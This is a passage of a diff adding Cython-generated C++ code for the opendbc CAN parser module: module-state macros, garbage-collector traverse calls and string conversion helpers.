Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser); + Py_VISIT(traverse_module_state->__pyx_type_7opendbc_3can_10parser_pyx_CANParser); + Py_VISIT(traverse_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine); + Py_VISIT(traverse_module_state->__pyx_type_7opendbc_3can_10parser_pyx_CANDefine); + Py_VISIT(traverse_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__); + Py_VISIT(traverse_module_state->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__); + Py_VISIT(traverse_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr); + Py_VISIT(traverse_module_state->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr); + Py_VISIT(traverse_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr); + Py_VISIT(traverse_module_state->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr); + Py_VISIT(traverse_module_state->__pyx_kp_u_); + Py_VISIT(traverse_module_state->__pyx_n_s_CANDefine); + Py_VISIT(traverse_module_state->__pyx_n_s_CANDefine___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_CANDefine___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_CANParser); + Py_VISIT(traverse_module_state->__pyx_n_s_CANParser___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_CANParser___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_CANParser_update_strings); + Py_VISIT(traverse_module_state->__pyx_kp_u_Can_t_find_DBC); + Py_VISIT(traverse_module_state->__pyx_kp_u_Can_t_find_DBC_2); + Py_VISIT(traverse_module_state->__pyx_kp_u_DBC); + Py_VISIT(traverse_module_state->__pyx_n_s_MemoryError); + Py_VISIT(traverse_module_state->__pyx_kp_u_None); + Py_VISIT(traverse_module_state->__pyx_n_s_Number); + Py_VISIT(traverse_module_state->__pyx_n_s_RuntimeError); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_kp_u_Unchecked_addrs); + Py_VISIT(traverse_module_state->__pyx_n_s__18); + Py_VISIT(traverse_module_state->__pyx_kp_u__2); + Py_VISIT(traverse_module_state->__pyx_kp_u__3); + Py_VISIT(traverse_module_state->__pyx_kp_u__4); + Py_VISIT(traverse_module_state->__pyx_n_s__7); + Py_VISIT(traverse_module_state->__pyx_kp_u__8); + Py_VISIT(traverse_module_state->__pyx_n_s_add); + Py_VISIT(traverse_module_state->__pyx_n_s_args); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_bus); + Py_VISIT(traverse_module_state->__pyx_n_s_checks); + Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); + Py_VISIT(traverse_module_state->__pyx_n_s_clear); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_close); + Py_VISIT(traverse_module_state->__pyx_n_s_collections); + Py_VISIT(traverse_module_state->__pyx_kp_u_could_not_find_message); + Py_VISIT(traverse_module_state->__pyx_kp_u_could_not_find_signal); + Py_VISIT(traverse_module_state->__pyx_n_s_cv); + Py_VISIT(traverse_module_state->__pyx_n_s_cv_name); + Py_VISIT(traverse_module_state->__pyx_n_s_dbc_name); + Py_VISIT(traverse_module_state->__pyx_n_s_defaultdict); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_enforce_checks); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_genexpr); + Py_VISIT(traverse_module_state->__pyx_n_s_get); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_s_hex); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_kp_u_in); + Py_VISIT(traverse_module_state->__pyx_kp_u_in_DBC); + Py_VISIT(traverse_module_state->__pyx_n_s_init___locals_genexpr); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_it); + Py_VISIT(traverse_module_state->__pyx_n_s_items); + Py_VISIT(traverse_module_state->__pyx_n_s_l); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_new_vals); + Py_VISIT(traverse_module_state->__pyx_n_s_numbers); + Py_VISIT(traverse_module_state->__pyx_n_s_opendbc_can_parser_pyx); + Py_VISIT(traverse_module_state->__pyx_kp_s_opendbc_can_parser_pyx_pyx); + Py_VISIT(traverse_module_state->__pyx_n_s_print); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_range); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_kp_s_self_can_self_dbc_cannot_be_conv); + Py_VISIT(traverse_module_state->__pyx_kp_s_self_dbc_cannot_be_converted_to); + Py_VISIT(traverse_module_state->__pyx_n_s_send); + Py_VISIT(traverse_module_state->__pyx_n_s_sendcan); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_signals); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + Py_VISIT(traverse_module_state->__pyx_n_s_split); + Py_VISIT(traverse_module_state->__pyx_n_s_strings); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_throw); + Py_VISIT(traverse_module_state->__pyx_n_s_update); + Py_VISIT(traverse_module_state->__pyx_n_s_update_strings); + Py_VISIT(traverse_module_state->__pyx_n_s_updated_addrs); + Py_VISIT(traverse_module_state->__pyx_n_s_v); + Py_VISIT(traverse_module_state->__pyx_n_s_values); + Py_VISIT(traverse_module_state->__pyx_n_s_zip); + Py_VISIT(traverse_module_state->__pyx_int_0); + Py_VISIT(traverse_module_state->__pyx_int_1); + Py_VISIT(traverse_module_state->__pyx_int_2); + Py_VISIT(traverse_module_state->__pyx_slice__5); + Py_VISIT(traverse_module_state->__pyx_slice__6); + Py_VISIT(traverse_module_state->__pyx_tuple__9); + Py_VISIT(traverse_module_state->__pyx_tuple__11); + Py_VISIT(traverse_module_state->__pyx_tuple__12); + Py_VISIT(traverse_module_state->__pyx_tuple__14); + Py_VISIT(traverse_module_state->__pyx_codeobj__10); + Py_VISIT(traverse_module_state->__pyx_codeobj__13); + Py_VISIT(traverse_module_state->__pyx_codeobj__15); + Py_VISIT(traverse_module_state->__pyx_codeobj__16); + Py_VISIT(traverse_module_state->__pyx_codeobj__17); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_7opendbc_3can_10parser_pyx_CANParser __pyx_mstate_global->__pyx_type_7opendbc_3can_10parser_pyx_CANParser +#define __pyx_type_7opendbc_3can_10parser_pyx_CANDefine __pyx_mstate_global->__pyx_type_7opendbc_3can_10parser_pyx_CANDefine +#define __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ __pyx_mstate_global->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ +#define __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr __pyx_mstate_global->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr +#define __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr __pyx_mstate_global->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr +#endif +#define __pyx_ptype_7opendbc_3can_10parser_pyx_CANParser __pyx_mstate_global->__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser +#define __pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine __pyx_mstate_global->__pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine +#define __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ __pyx_mstate_global->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ +#define __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr __pyx_mstate_global->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr +#define __pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr __pyx_mstate_global->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr +#define __pyx_kp_u_ __pyx_mstate_global->__pyx_kp_u_ +#define __pyx_n_s_CANDefine __pyx_mstate_global->__pyx_n_s_CANDefine +#define __pyx_n_s_CANDefine___reduce_cython __pyx_mstate_global->__pyx_n_s_CANDefine___reduce_cython +#define __pyx_n_s_CANDefine___setstate_cython __pyx_mstate_global->__pyx_n_s_CANDefine___setstate_cython +#define __pyx_n_s_CANParser __pyx_mstate_global->__pyx_n_s_CANParser +#define __pyx_n_s_CANParser___reduce_cython __pyx_mstate_global->__pyx_n_s_CANParser___reduce_cython +#define __pyx_n_s_CANParser___setstate_cython __pyx_mstate_global->__pyx_n_s_CANParser___setstate_cython +#define __pyx_n_s_CANParser_update_strings __pyx_mstate_global->__pyx_n_s_CANParser_update_strings +#define __pyx_kp_u_Can_t_find_DBC __pyx_mstate_global->__pyx_kp_u_Can_t_find_DBC +#define __pyx_kp_u_Can_t_find_DBC_2 __pyx_mstate_global->__pyx_kp_u_Can_t_find_DBC_2 +#define __pyx_kp_u_DBC __pyx_mstate_global->__pyx_kp_u_DBC +#define __pyx_n_s_MemoryError __pyx_mstate_global->__pyx_n_s_MemoryError +#define __pyx_kp_u_None __pyx_mstate_global->__pyx_kp_u_None +#define __pyx_n_s_Number __pyx_mstate_global->__pyx_n_s_Number +#define __pyx_n_s_RuntimeError __pyx_mstate_global->__pyx_n_s_RuntimeError +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_kp_u_Unchecked_addrs __pyx_mstate_global->__pyx_kp_u_Unchecked_addrs +#define __pyx_n_s__18 __pyx_mstate_global->__pyx_n_s__18 +#define __pyx_kp_u__2 __pyx_mstate_global->__pyx_kp_u__2 +#define __pyx_kp_u__3 __pyx_mstate_global->__pyx_kp_u__3 +#define __pyx_kp_u__4 __pyx_mstate_global->__pyx_kp_u__4 +#define __pyx_n_s__7 __pyx_mstate_global->__pyx_n_s__7 +#define __pyx_kp_u__8 __pyx_mstate_global->__pyx_kp_u__8 +#define __pyx_n_s_add __pyx_mstate_global->__pyx_n_s_add +#define __pyx_n_s_args __pyx_mstate_global->__pyx_n_s_args +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_bus __pyx_mstate_global->__pyx_n_s_bus +#define __pyx_n_s_checks __pyx_mstate_global->__pyx_n_s_checks +#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem +#define __pyx_n_s_clear __pyx_mstate_global->__pyx_n_s_clear +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_close __pyx_mstate_global->__pyx_n_s_close +#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections +#define __pyx_kp_u_could_not_find_message __pyx_mstate_global->__pyx_kp_u_could_not_find_message +#define __pyx_kp_u_could_not_find_signal __pyx_mstate_global->__pyx_kp_u_could_not_find_signal +#define __pyx_n_s_cv __pyx_mstate_global->__pyx_n_s_cv +#define __pyx_n_s_cv_name __pyx_mstate_global->__pyx_n_s_cv_name +#define __pyx_n_s_dbc_name __pyx_mstate_global->__pyx_n_s_dbc_name +#define __pyx_n_s_defaultdict __pyx_mstate_global->__pyx_n_s_defaultdict +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_enforce_checks __pyx_mstate_global->__pyx_n_s_enforce_checks +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_genexpr __pyx_mstate_global->__pyx_n_s_genexpr +#define __pyx_n_s_get __pyx_mstate_global->__pyx_n_s_get +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_s_hex __pyx_mstate_global->__pyx_n_s_hex +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_kp_u_in __pyx_mstate_global->__pyx_kp_u_in +#define __pyx_kp_u_in_DBC __pyx_mstate_global->__pyx_kp_u_in_DBC +#define __pyx_n_s_init___locals_genexpr __pyx_mstate_global->__pyx_n_s_init___locals_genexpr +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_it __pyx_mstate_global->__pyx_n_s_it +#define __pyx_n_s_items __pyx_mstate_global->__pyx_n_s_items +#define __pyx_n_s_l __pyx_mstate_global->__pyx_n_s_l +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_new_vals __pyx_mstate_global->__pyx_n_s_new_vals +#define __pyx_n_s_numbers __pyx_mstate_global->__pyx_n_s_numbers +#define __pyx_n_s_opendbc_can_parser_pyx __pyx_mstate_global->__pyx_n_s_opendbc_can_parser_pyx +#define __pyx_kp_s_opendbc_can_parser_pyx_pyx __pyx_mstate_global->__pyx_kp_s_opendbc_can_parser_pyx_pyx +#define __pyx_n_s_print __pyx_mstate_global->__pyx_n_s_print +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_kp_s_self_can_self_dbc_cannot_be_conv __pyx_mstate_global->__pyx_kp_s_self_can_self_dbc_cannot_be_conv +#define __pyx_kp_s_self_dbc_cannot_be_converted_to __pyx_mstate_global->__pyx_kp_s_self_dbc_cannot_be_converted_to +#define __pyx_n_s_send __pyx_mstate_global->__pyx_n_s_send +#define __pyx_n_s_sendcan __pyx_mstate_global->__pyx_n_s_sendcan +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_signals __pyx_mstate_global->__pyx_n_s_signals +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_n_s_split __pyx_mstate_global->__pyx_n_s_split +#define __pyx_n_s_strings __pyx_mstate_global->__pyx_n_s_strings +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_throw __pyx_mstate_global->__pyx_n_s_throw +#define __pyx_n_s_update __pyx_mstate_global->__pyx_n_s_update +#define __pyx_n_s_update_strings __pyx_mstate_global->__pyx_n_s_update_strings +#define __pyx_n_s_updated_addrs __pyx_mstate_global->__pyx_n_s_updated_addrs +#define __pyx_n_s_v __pyx_mstate_global->__pyx_n_s_v +#define __pyx_n_s_values __pyx_mstate_global->__pyx_n_s_values +#define __pyx_n_s_zip __pyx_mstate_global->__pyx_n_s_zip +#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 +#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 +#define __pyx_int_2 __pyx_mstate_global->__pyx_int_2 +#define __pyx_slice__5 __pyx_mstate_global->__pyx_slice__5 +#define __pyx_slice__6 __pyx_mstate_global->__pyx_slice__6 +#define __pyx_tuple__9 __pyx_mstate_global->__pyx_tuple__9 +#define __pyx_tuple__11 __pyx_mstate_global->__pyx_tuple__11 +#define __pyx_tuple__12 __pyx_mstate_global->__pyx_tuple__12 +#define __pyx_tuple__14 __pyx_mstate_global->__pyx_tuple__14 +#define __pyx_codeobj__10 __pyx_mstate_global->__pyx_codeobj__10 +#define __pyx_codeobj__13 __pyx_mstate_global->__pyx_codeobj__13 +#define __pyx_codeobj__15 __pyx_mstate_global->__pyx_codeobj__15 +#define __pyx_codeobj__16 __pyx_mstate_global->__pyx_codeobj__16 +#define __pyx_codeobj__17 __pyx_mstate_global->__pyx_codeobj__17 +/* #### Code section: module_code ### */ + +/* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *__pyx_v_o) { + Py_ssize_t __pyx_v_length; + char const *__pyx_v_data; + std::string __pyx_r; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_string_from_py_std__in_string", 0); + + /* "string.from_py":14 + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 # <<<<<<<<<<<<<< + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) + */ + __pyx_v_length = 0; + + /* "string.from_py":15 + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) # <<<<<<<<<<<<<< + * return string(data, length) + * + */ + __pyx_t_1 = __Pyx_PyObject_AsStringAndSize(__pyx_v_o, (&__pyx_v_length)); if (unlikely(__pyx_t_1 == ((char const *)NULL))) __PYX_ERR(1, 15, __pyx_L1_error) + __pyx_v_data = __pyx_t_1; + + /* "string.from_py":16 + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) # <<<<<<<<<<<<<< + * + * + */ + try { + __pyx_t_2 = std::string(__pyx_v_data, __pyx_v_length); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 16, __pyx_L1_error) + } + __pyx_r = __pyx_t_2; + goto __pyx_L0; + + /* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("string.from_py.__pyx_convert_string_from_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyObject_string_to_py_std__in_string", 0); + + /* "string.to_py":32 + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyUnicode_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyObject_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyUnicode_string_to_py_std__in_string", 0); + + /* "string.to_py":38 + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyStr_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyUnicode_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyUnicode_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyStr_string_to_py_std__in_string", 0); + + /* "string.to_py":44 + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyBytes_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyStr_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 44, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyStr_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyBytes_string_to_py_std__in_string", 0); + + /* "string.to_py":50 + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyByteArray_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + 